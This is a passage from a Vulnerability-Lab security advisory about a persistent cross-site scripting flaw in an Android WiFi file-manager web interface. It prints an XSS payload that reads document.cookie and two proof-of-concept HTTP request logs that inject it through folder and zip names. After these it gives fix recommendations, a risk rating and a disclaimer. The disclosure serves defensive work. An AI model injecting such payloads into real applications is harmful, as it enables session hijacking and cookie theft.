folder name, file name or zip file and save via post method request 5. The payload executes in the web ui when previewing the paths Exploitation: Payload <a onmouseover=alert(document.cookie)>picture1337.jpg</a> --- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] --- http://localhost:1234/storage/emulated/0/DCIM/ Host: localhost:1234 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676 Content-Length: 613 Origin:http://localhost:1234 Connection: keep-alive Referer:http://localhost:1234/storage/emulated/0/DCIM/ action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/ - POST: HTTP/1.1 302 OK Connection: Close Content-Type: text/html Location:http://localhost:1234/storage/emulated/0/DCIM/ Content-Length: 143 - http://localhost:1234/storage/emulated/0/DCIM/ Host: localhost:1234 Accept-Encoding: gzip, deflate Referer:http://localhost:1234/storage/emulated/0/DCIM/ Connection: keep-alive - POST: HTTP/1.1 200 OK Connection: Close Content-Type: text/html --- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] --- http://localhost:1234/storage/emulated/0/Pictures/? Host: localhost:1234 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045 Content-Length: 882 Origin:http://localhost:1234 Connection: keep-alive Referer:http://localhost:1234/storage/emulated/0/Pictures/? Upgrade-Insecure-Requests: 1 action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file - POST: HTTP/1.1 200 OK Connection: Close Content-Type: text/html Location:http://localhost:1234/storage/emulated/0/Pictures/ Content-Length: 151 - http://localhost:1234/storage/emulated/0/Pictures/ Host: localhost:1234 Accept-Encoding: gzip, deflate Referer:http://localhost:1234/storage/emulated/0/Pictures/? Connection: keep-alive Upgrade-Insecure-Requests: 1 - POST: HTTP/1.1 200 OK Connection: Close Content-Type: text/html Reference(s): http://localhost:1234/ http://localhost:1234/storage/ http://localhost:1234/storage/emulated/ http://localhost:1234/storage/emulated/0/ http://localhost:1234/storage/emulated/0/DCIM/ http://localhost:1234/storage/emulated/0/Pictures/ Solution - Fix & Patch: ======================= The persistent web vulnerabilities can be resolved by the following steps ... 1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process 2. Encode and escape the content of the data_file parameter to sanitize the content 3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>